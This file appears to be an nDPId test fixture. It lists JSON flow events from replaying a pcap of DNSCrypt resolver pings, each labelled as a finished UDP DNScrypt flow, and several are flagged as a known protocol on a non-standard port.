-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318201,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312405,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317434,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312136,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304815,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396214,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304793,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311308,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305459,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299356,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305217,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337079,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312401,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396113,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304791,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348804,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305351,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305330,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304629,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305194,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381015,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312133,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317429,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
